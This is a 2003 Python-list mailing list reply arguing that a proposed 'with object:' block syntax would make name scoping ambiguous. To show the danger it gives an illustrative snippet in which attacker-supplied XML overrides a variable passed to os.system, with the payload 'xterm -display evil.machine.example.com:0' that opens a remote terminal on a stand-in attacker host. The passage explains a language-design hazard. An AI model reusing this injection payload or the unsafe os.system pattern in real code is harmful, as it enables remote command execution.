Code block literals
Andrew Dalke
adalke at mindspring.com
Thu Oct 9 17:31:12 EDT 2003
Dave Benjamin:
> What's implicit to me is that the use of an iterator is never specified.
It is by the definition of what the for loop does.
> For instance, we could (and I'm *not* suggesting this) do this:
>
> iterator = file('input.txt')
> while iterator.has_next():
> line = iterator.next()
> do_something_with(line)
Good thing you aren't, since has_next might be impossible to
implement. ;)
> > If Python's syntax defined
> > other forms of suites, e.g. hypothetically:
> >
> > with <object>:
> > <suite>
> >
> > meaning to call the object (or some given method[s] in it, whatever)
> > with the suite as its argument, it would be just as explicit as, e.g.:
> >
> > for <name> in <object>:
> > <suite>
A reasonable point. However, inside the 'with' statement it's hard
to know if
print x
comes from the object or from the static scoping, and it may
be that 99.99% of the time it's from static scoping, only to find
after deployment that there's code like
logger = "echo got it >> file.log"
...
def parse_server_request(self, infile, outfile):
obj = parse_XML_into_some_pythonic_data_structure(infile)
with obj:
outfile.write("Content-Type: text/plain\n\n")
outfile.write("Hi, " + username + "\n")
os.system(logger)
which lets malicious user input pass in XML with the content
<logger>xterm -display evil.machine.example.com:0</logger>
that ends up being passed to the system call.
I've been on this thread too long so I won't answer anything from the rest
of your response. :(
Andrew
dalke at dalkescientific.com
More information about the Python-list
mailing list